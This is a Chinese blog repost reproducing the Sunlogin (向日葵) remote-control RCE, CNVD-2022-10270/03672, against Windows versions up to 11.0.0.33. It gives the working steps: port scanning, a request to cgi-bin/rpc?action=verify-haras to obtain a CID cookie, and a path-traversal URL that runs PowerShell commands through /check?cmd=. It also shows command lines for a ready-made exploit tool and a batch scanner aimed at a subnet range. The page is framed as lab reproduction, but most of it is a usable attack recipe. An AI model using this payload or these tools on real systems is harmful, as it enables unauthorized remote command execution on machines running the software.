首页 > 其他分享 >向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672

时间:2023-02-19 19:32:10浏览次数:39  
标签:.. 10270 CNVD 漏洞 向日葵 复现 2022

前言

向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,进攻者可利用该漏洞获取服务器控制权。

影响版本

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)

漏洞级别

高危

环境搭建

在虚拟机里安装11.0.0.33的低版本向日葵

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_信息安全


漏洞复现

使用nmap或其他工具探测目标端口

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_工具分享利用_02

在浏览器中访问ip+端口号+cgi-bin/rpc?actinotallow=verify-haras  (端口号:每一个都尝试,直到获取到session值CID)

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_信息安全_03

Cookies添加拿到的CID后加上payload请求

​http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami​

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_工具分享利用_04

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_CVE漏洞复现_05

手动复现完成


工具使用

使用工具自带的扫描

​xrkRce.exe​​ -h ip -t scan

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_CVE漏洞复现_06

测试命令执行

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_工具分享利用_07


批量检测

​python3 sunlogin-fuzz.py -t 192.168.52.128/25​

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_CVE漏洞复现_08

相关工具文件,安装包私信公众号向日葵获取

原文转载自,助安社区(https://secself.com/)

关注公众号【助安社区】安全零基础到入门都在这,社区内部红队沙龙、资源共享和大厂工作经验。真正热爱安全和喜欢技术交流的小伙伴欢迎加入我们。

向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672_信息安全_09

标签:..,10270,CNVD,漏洞,向日葵,复现,2022
From: https://blog.51cto.com/u_15892398/6066811

相关文章

  • 230101_良许翻天覆地的2022年
    大家好,我是良许,新年快乐呀~在我女室友坚持不懈的努力之下,2022年的最后一天我终于被她传染了,阳了~此时的我,正顶着37多度的低烧写下这篇年终总结。2022年,对于大多数人而言,封控......
  • 各县全要素生产率数据、县级全要素生产率数据(2000-2022)
    各县全要素生产率数据、县级全要素生产率数据(2000-2022)各县全要素生产率数据、县级全要素生产率数据(2000-2022)各县全要素生产率数据、县级全要素生产率数据(2000-2022)数据......
  • 良许翻天覆地的2022年
    大家好,我是良许,新年快乐呀~在我女室友坚持不懈的努力之下,2022年的最后一天我终于被她传染了,阳了~此时的我,正顶着37多度的低烧写下这篇年终总结。2022年,对于大多数人而言......
  • A - k-rounding 【2022级专题四数论课后练习】
    A-k-rounding[原题链接]思路求\(n\)和\(10^k\)的最小公倍数最小公倍数和最大公因数的关系\(a\cdotb=最小公倍数\cdot最大公因数\)代码点击查看代码#incl......
  • 2022.2.19闲话
    00:46:就是感觉最近都没什么干劲,学校里的课业知识是真的不太想学,除了数学以外的学科都是大折磨。不懂但是还要搞,是因为对我而言很痛苦但是对其他人类来说并不一定如此。啊......
  • B - Learning Languages【2022级专题三图论课后练习】
    B-LearningLanguages原题链接思路由于可以传译,所以可以将共同语言(包括传译)者视为一个集合(合并),最后查询总共集合数-1就是答案注意特判:有可能有公司所有人一种语言都......
  • A - 并查集【2022级专题三图论课后练习】
    A-并查集思路模板注意01串的处理代码点击查看代码#include<iostream>usingnamespacestd;#defineXfirst#defineYsecondtypedefpair<int,int>pii;......
  • B - 滑雪【2022GDUT寒假集训-简单DP】
    B-滑雪原题链接思路\(定义f(i,j)为从坐标(i,j)出发的最大值\)\(状态转移方程f(i,j)=max(f(i+dx[k],j+dy[k]))\)\(答案为max(f(1,1),f(1,2),...,f(n,m))\)注意......
  • A - 摆花【2022GDUT寒假集训-简单DP】
    摆花原题链接思路\(\text{有}n\text{个数}\left(c_{1},c_{2},\ldots,c_{n}\right),0\leqslantc_{i}\leqslanta_{i}\text{,求有多少种方案数使}\s......
  • 【专题】2022智能汽车云服务白皮书报告PDF合集分享(附原数据图表)
    报告链接:http://tecdat.cn/?p=31515原文出处:拓端数据公众号汽车和互联网技术产业的新生力量已经吹响了变革的号角,它们在争夺人心。传统汽车制造商也受益于这一趋势,获得了......